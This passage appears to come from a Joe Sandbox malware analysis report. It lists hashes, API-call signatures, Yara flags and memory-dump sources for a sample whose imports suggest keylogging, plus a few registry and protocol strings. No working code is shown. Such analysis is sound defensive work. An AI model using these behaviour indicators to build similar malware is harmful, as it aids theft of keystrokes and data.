                          • API ID: Message$Peek$CloseDispatchErrorEventHandleLastMultipleObjectsTranslateWait
                          • String ID:
                          • API String ID: 1713936993-0
                          • Opcode ID: 90a3110bf25015334eda103b4dedeb1e46d3b967c95bf731c5aa3acee31876e2
                          • Instruction ID: bc94b0e70aa930b097f886973eabf088943eee2cd1ede2d52310e4abc483038d
                          • Opcode Fuzzy Hash: 90a3110bf25015334eda103b4dedeb1e46d3b967c95bf731c5aa3acee31876e2
                          • Instruction Fuzzy Hash: 58217F326505C282F7609F35E494F9E32B3FBA5B48F54423DDA5A825A4DF38CE5ACB01
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$HeapReset$CreateCriticalDestroyEnterFreeSection
                          • String ID:
                          • API String ID: 1658878062-0
                          • Opcode ID: b15515cd42b3c7a59d11d40a96123be03e24d317c2afb497afd93c342ce18e7a
                          • Instruction ID: f8b241b9cd6935d1207d0273672034702bc668b4f763ae6fb941968f79ddbd72
                          • Opcode Fuzzy Hash: b15515cd42b3c7a59d11d40a96123be03e24d317c2afb497afd93c342ce18e7a
                          • Instruction Fuzzy Hash: 78310636240BC2E2F698DB21E6847DCB776F754B80F50412ADB6A43651DF70EAB6C340
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                          • String ID:
                          • API String ID: 113790786-0
                          • Opcode ID: 4fc1ef6820775603606cc9dc222b7fdce9a924a0b9393d1a9cfc6eff100aeab1
                          • Instruction ID: 50bf1cf4b819c40919b1a9062a3826e2ec3a2d382361ad5e879d51f91b0c0858
                          • Opcode Fuzzy Hash: 4fc1ef6820775603606cc9dc222b7fdce9a924a0b9393d1a9cfc6eff100aeab1
                          • Instruction Fuzzy Hash: CD21D1316846E382F614AB32E805FEE23B7E780B84F05603CEA46476D6CF38CE428350
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$AllocHeap_callnewhfreemalloc
                          • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                          • API String ID: 3198430600-868042568
                          • Opcode ID: b9c24d6dd6d448623d8194ce3ec9ac1b7630b16744956a884b9e9d050a879636
                          • Instruction ID: 8dd71b149989431801593a53281c0903e6b04ee5ea2531b89fd2ee64132df9bd
                          • Opcode Fuzzy Hash: b9c24d6dd6d448623d8194ce3ec9ac1b7630b16744956a884b9e9d050a879636
                          • Instruction Fuzzy Hash: EDE1A0726446D28BF7768B29E4D0B9A7BB3FB84784F144029DB9643B85D738DE46CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                          • String ID:
                          • API String ID: 3058130114-0
                          • Opcode ID: e284b261f3e280a2c9a426dcad1901252badce78381e2805f3eccfd93789d7af
                          • Instruction ID: f4ec884d58e22df76d0af162c33abf7e59498c4bc948314c5003774c011ca560
                          • Opcode Fuzzy Hash: e284b261f3e280a2c9a426dcad1901252badce78381e2805f3eccfd93789d7af
                          • Instruction Fuzzy Hash: CA615B31280AC286FB649F25D8D4BD923B7F744B98F544239EE5A867D5EF34CE428310
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseValue$CreateDeleteHandle_callnewhmallocstd::exception::exception
                          • String ID: Console\1
                          • API String ID: 2917754286-1035756066
                          • Opcode ID: 365750352fc34f55ffdf8fce61dcb1794e0e3b63090383709f973ce8d9472500
                          • Instruction ID: 01f440c5927aff43275948b01d6ee801a2288fdca4fff3429b5dedcf245b3d48
                          • Opcode Fuzzy Hash: 365750352fc34f55ffdf8fce61dcb1794e0e3b63090383709f973ce8d9472500
                          • Instruction Fuzzy Hash: DC517832300B9282FB58DB11E594BEE7376F789BC4F41412AAA4E47795CF38CA52C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 2574049805-3916222277
                          • Opcode ID: b4bc058c78e50e6e57c4f554ad32398b5525bb103744436a3dc36264a1bdab3a
                          • Instruction ID: 17e60d75e8dfbe2a185c723c99763aad1d1d53a16e5c7449de32f05b7755ae50
                          • Opcode Fuzzy Hash: b4bc058c78e50e6e57c4f554ad32398b5525bb103744436a3dc36264a1bdab3a
                          • Instruction Fuzzy Hash: 3941E1726407A245FB299F39D452BAC3AB3E784B94F146238DA14073D5EB38CE53C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$FreeHeap$ByteCharCriticalDeleteEnvironmentMultiSectionStringsWide$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValueVersion__setargv_cinit_errno
                          • String ID:
                          • API String ID: 125979975-0
                          • Opcode ID: 5c7a198a6bf3e74a284814fe9030744537be58b3e98e31e514715c20926680aa
                          • Instruction ID: d0b45efa1d559b73d2593d346e09de21b320ef253adc859d84d6c9abb4bf27a9
                          • Opcode Fuzzy Hash: 5c7a198a6bf3e74a284814fe9030744537be58b3e98e31e514715c20926680aa
                          • Instruction Fuzzy Hash: 263119306C42E386FA647776E906FE961B7AB60754F15613DA813C11D3EF28CF835212
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: adb07d1321ee7856dbb04410b93dc9777c949db3f49432debc9022dfd59ee3b0
                          • Instruction ID: 21a51206262e3b83940bd3854ecd8f97297cab4d83c1b84ae5e6dcb1a1d0daf1
                          • Opcode Fuzzy Hash: adb07d1321ee7856dbb04410b93dc9777c949db3f49432debc9022dfd59ee3b0
                          • Instruction Fuzzy Hash: 47213B321D8B844EF2196B68D9C2BF932F2EB45321F00026DF446C75D3D7A89D4382A2
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: e6985e12e6397c150a5502346323367360a42ad96b1106eccce0c26d1ba362ba
                          • Instruction ID: b464c3c5f5296ce87c9c9bc0de29803d097fce147d53b4830849c1b87ce4ff12
                          • Opcode Fuzzy Hash: e6985e12e6397c150a5502346323367360a42ad96b1106eccce0c26d1ba362ba
                          • Instruction Fuzzy Hash: F6213B30258A840EF3286F58D896BFD37EAEF46324F2D026DE547872D3D764AD434292
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 97455be3f636bc858ff527ab103684d291f06a334aad1a202db7ad900f8e3f22
                          • Instruction ID: 526c8ed1c87ba55762ddcd40bb4b45fd5efe456e0a19ed34c084da828c80cda1
                          • Opcode Fuzzy Hash: 97455be3f636bc858ff527ab103684d291f06a334aad1a202db7ad900f8e3f22
                          • Instruction Fuzzy Hash: 7221F7726C86844EF3186F68EDC2BF832F6EB45321F05026DF486875D3D7A49D4382A2
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: f466c2900776dec78709f31630f8c073b92f50b4fa8424f811fbf9e3ff3e681c
                          • Instruction ID: 8115f9cbdc06c205e6c475f85f7f0fb22885f0025e67db9c4a648815782496be
                          • Opcode Fuzzy Hash: f466c2900776dec78709f31630f8c073b92f50b4fa8424f811fbf9e3ff3e681c
                          • Instruction Fuzzy Hash: 542107305486844EF3656F5CD896BFC37AAEF4A320F2D026DE507871E3D7689D434292
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$write_char
                          • String ID:
                          • API String ID: 1772936973-0
                          • Opcode ID: d432c042707113eef219af6e0ad2687e08b2bf50df0bf66eaea8f2f9f5c7417f
                          • Instruction ID: c2c15faa81b8b335dcbc94bd491a894e4ee4605c2b365d451cc6f13b830d1564
                          • Opcode Fuzzy Hash: d432c042707113eef219af6e0ad2687e08b2bf50df0bf66eaea8f2f9f5c7417f
                          • Instruction Fuzzy Hash: 7921C3324C8B984FFBA4AF58C182FE432F2EB59315F11516DE448C7592C730ED428782
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$write_char
                          • String ID:
                          • API String ID: 1772936973-0
                          • Opcode ID: cf7df7c98addab0dc0e3b1a63959e8151b81c0f80027ab393a2132f63f18ac25
                          • Instruction ID: dfd5e1518777574292f3d0c9fa477642521c336aae4c4d2124f47cf9e93d5682
                          • Opcode Fuzzy Hash: cf7df7c98addab0dc0e3b1a63959e8151b81c0f80027ab393a2132f63f18ac25
                          • Instruction Fuzzy Hash: 002181325C8B988FFB68AB58C542BA432F1FB59311F10116DE449C75D3D774DE428786
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$write_char
                          • String ID:
                          • API String ID: 1772936973-0
                          • Opcode ID: c71356e80ab61c116f08e0e7252ee1ba80ccbfc151ac000d77de5458481281de
                          • Instruction ID: 1d4059699513e1ff989e2e857c6144cb570af959ee4fe59ab1e2554fbe512a00
                          • Opcode Fuzzy Hash: c71356e80ab61c116f08e0e7252ee1ba80ccbfc151ac000d77de5458481281de
                          • Instruction Fuzzy Hash: A9214D30554A888FF7A4AE58C046BA537F5EF99311F3E02BDA45AC7293D770DE428782
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_close_nolock_errno
                          • String ID:
                          • API String ID: 186997739-0
                          • Opcode ID: 466cc7396c1cc10912a76d8dcb8aa306f0142ba951475728dc8fb5e6dd3ea738
                          • Instruction ID: f70c8ee4411f6e53f0771d8fd38175afba5f5ceb85a1fdbbd6266e8c432fc191
                          • Opcode Fuzzy Hash: 466cc7396c1cc10912a76d8dcb8aa306f0142ba951475728dc8fb5e6dd3ea738
                          • Instruction Fuzzy Hash: D72127331C96804EF3046B65DAD2BE83AF2EB45321F11453CF016879D3D775CE864655
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __doserrno_close_nolock_errno
                          • String ID:
                          • API String ID: 186997739-0
                          • Opcode ID: dd9d7f979b81a8699f053dee8420159905e3cc7e97c07634a21e015c23129739
                          • Instruction ID: 8343bd85e0813b3510b75bbe6fb3ba3bc80b0d298f2dc3d42862ee5df645213c
                          • Opcode Fuzzy Hash: dd9d7f979b81a8699f053dee8420159905e3cc7e97c07634a21e015c23129739
                          • Instruction Fuzzy Hash: 0F21BE315856844AF714ABA4C896BEC77BAAF86320F2D457CE01B871E3C774CE428252
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 09c70d8d37d13d61aee410d3f235f2ba24f94fa1cbdaf45efdae3760bbd383ae
                          • Instruction ID: 283dfd28dd101cb53813a9819233c90e386ba3a384ec746672b4a614141167b1
                          • Opcode Fuzzy Hash: 09c70d8d37d13d61aee410d3f235f2ba24f94fa1cbdaf45efdae3760bbd383ae
                          • Instruction Fuzzy Hash: AE21F9326505E249FA09AF35D982BED65739780BA1F46612CEF14073D6C778CE438B10
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 1239332d20303c5a50c65b0066d77a0a022a4de7cac9ff6e062bd27df312ce82
                          • Instruction ID: 3af08efb0cd0729649725b51e1b401d4c39cf6cccf82d9f8b0bbb98f93be5176
                          • Opcode Fuzzy Hash: 1239332d20303c5a50c65b0066d77a0a022a4de7cac9ff6e062bd27df312ce82
                          • Instruction Fuzzy Hash: D721D4322501A245FA056F35D952BED6673A781BB1F4A232DDF350B3D6CB78CE428720
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$BuffersErrorFileFlushLast__doserrno
                          • String ID:
                          • API String ID: 1845094721-0
                          • Opcode ID: 92246146ac22801513e11eef1ccf583f360b70cb192a4f31d30353fc8b85e09a
                          • Instruction ID: 2c4793129b8cbaad7fa54abc60335d5e1c158495b866a9db6a530f7cab58adba
                          • Opcode Fuzzy Hash: 92246146ac22801513e11eef1ccf583f360b70cb192a4f31d30353fc8b85e09a
                          • Instruction Fuzzy Hash: 2E2105316806E345F6566F64E895BED6A73AB80790F05613DEA21073D2CB78CE43C310
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                          • String ID: [
                          • API String ID: 3163932117-4056885943
                          • Opcode ID: b85160648a62d3303c1f720c1aa9f274de9beabe1632b1bf58264dd0c81a2883
                          • Instruction ID: 74c3f28b2644877090f3c87e1868b069732f98341bf81eb6c8232773e81cbfdd
                          • Opcode Fuzzy Hash: b85160648a62d3303c1f720c1aa9f274de9beabe1632b1bf58264dd0c81a2883
                          • Instruction Fuzzy Hash: E0312C31658A96C1F750DB56F851BA6B3B3F784740F40402EA989426A9DF7CCA5ACF40
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_close_nolock_errno
                          • String ID:
                          • API String ID: 186997739-0
                          • Opcode ID: db6b694d186b23cc907136b623f0fb9f1178e56bcf07348fea53597191f401e8
                          • Instruction ID: 1144f9ddf5f758ecc80f131561088e126bdd23ad8fa38866a36f6ea927bb2249
                          • Opcode Fuzzy Hash: db6b694d186b23cc907136b623f0fb9f1178e56bcf07348fea53597191f401e8
                          • Instruction Fuzzy Hash: 8B110B326842E285F7056F75D886BDC2673E7817A1F69263CAA15473D3C778CE438714
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$write_char
                          • String ID:
                          • API String ID: 1772936973-0
                          • Opcode ID: fbb30c4e2186c998f425e18416f54d05b4074133aff0d1338df02403602f3b90
                          • Instruction ID: f003b97dffe112cd62e8919687c17a76e20ba9a9a70e17e3452bc3b937130ee6
                          • Opcode Fuzzy Hash: fbb30c4e2186c998f425e18416f54d05b4074133aff0d1338df02403602f3b90
                          • Instruction Fuzzy Hash: 741182324807E28AF760ABA1D4017DDB6B3F395BD1F59A128DF4407796CB38CE828781
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$write_char
                          • String ID:
                          • API String ID: 1772936973-0
                          • Opcode ID: 45baae2fde74618746f6b6203c9441344442621bcc6d007daa8fb462ddadbe2e
                          • Instruction ID: ecbd4b39761dec841757dc965e316d29bddd14913839b09f19b354b27677baaf
                          • Opcode Fuzzy Hash: 45baae2fde74618746f6b6203c9441344442621bcc6d007daa8fb462ddadbe2e
                          • Instruction Fuzzy Hash: 401167329807E286FB60AF12E4017DC66B3F794B90F09602ADB4407787CB38CE828741
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                          • String ID:
                          • API String ID: 4202892810-0
                          • Opcode ID: 1fdd24094954658e294e17131c08b774f2d2fa2c2b92087c8cd534904e702a95
                          • Instruction ID: 53f659105151bd10b5cd992983932e0c6267315c7d285be452b26c9dec61fc39
                          • Opcode Fuzzy Hash: 1fdd24094954658e294e17131c08b774f2d2fa2c2b92087c8cd534904e702a95
                          • Instruction Fuzzy Hash: 1F117031244A8282F7509B15F818B997373F798BB4F504229DAAA037E5CF7CCA4ACB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value$CloseDeleteOpen
                          • String ID: Console$IpDatespecial
                          • API String ID: 3183427449-1840232981
                          • Opcode ID: ecf80bc97f28127a6a78c17fa9fa92f782d6466a7d39209f1e49dd3ba08303c1
                          • Instruction ID: 326e42d6428f96b2d743d6cae7445ce0bd4fa313da6ea37cf96677da661c7da1
                          • Opcode Fuzzy Hash: ecf80bc97f28127a6a78c17fa9fa92f782d6466a7d39209f1e49dd3ba08303c1
                          • Instruction Fuzzy Hash: E8015276355A8186F721DB14F954B883732F384BD8F404126CE4D43A98CF78C68AC718
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd
                          • String ID: MOC$RCC$csm
                          • API String ID: 3186804695-2671469338
                          • Opcode ID: d0c629851adb83669a1057044e1c73a61abea7eb16c4708499e842e3cc9a1464
                          • Instruction ID: 715aa2e631a4bd4cdfee6c8eea9410f1a6b7fb2337599f63f46fa3fd2f2dfc41
                          • Opcode Fuzzy Hash: d0c629851adb83669a1057044e1c73a61abea7eb16c4708499e842e3cc9a1464
                          • Instruction Fuzzy Hash: C7F030341411448FF7557724C00ABE832BAAF29305F6D56BD9845861B3E7AC8E828763
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$_amsg_exit
                          • String ID: MOC$RCC$csm
                          • API String ID: 2610988583-2671469338
                          • Opcode ID: 8d659f9cf181ea6894d5fd2041ae1ae5554f48ed223342e65feff7cba86f97e8
                          • Instruction ID: 141e07e3a170c475309c4cf990e2ec3ec78045ccbe3adeaa7eb9ef423355f31d
                          • Opcode Fuzzy Hash: 8d659f9cf181ea6894d5fd2041ae1ae5554f48ed223342e65feff7cba86f97e8
                          • Instruction Fuzzy Hash: E8F06535590282C7F7557B65C005BDC35B7E798B09F86A47E921842382C77DCF828A12
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno_getptd$_lockmalloc
                          • String ID:
                          • API String ID: 1369581901-0
                          • Opcode ID: fa3c888a0b64dc31fd6d50a7605defed2034a0cfb1504f517c669a6b37a44c87
                          • Instruction ID: 38de4b16b10b222c523c67b7a85ab020810a82dea93692d5ffa55ff7a870e8b5
                          • Opcode Fuzzy Hash: fa3c888a0b64dc31fd6d50a7605defed2034a0cfb1504f517c669a6b37a44c87
                          • Instruction Fuzzy Hash: A651AC31698A848FF794AB68D581BE97BF6EB59300F10417DD849C3AA2DB24DE438742
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: free$_errno_getptd$_lockmalloc
                          • String ID:
                          • API String ID: 1369581901-0
                          • Opcode ID: d61b86b512d42a64d26f0cc6f2a9babad53696149dbf6f9fd76c06f3c4ff0c9d
                          • Instruction ID: da0716b7bef316957649557ff8c49967023f91262b0d092133d65cdbc9fbc11b
                          • Opcode Fuzzy Hash: d61b86b512d42a64d26f0cc6f2a9babad53696149dbf6f9fd76c06f3c4ff0c9d
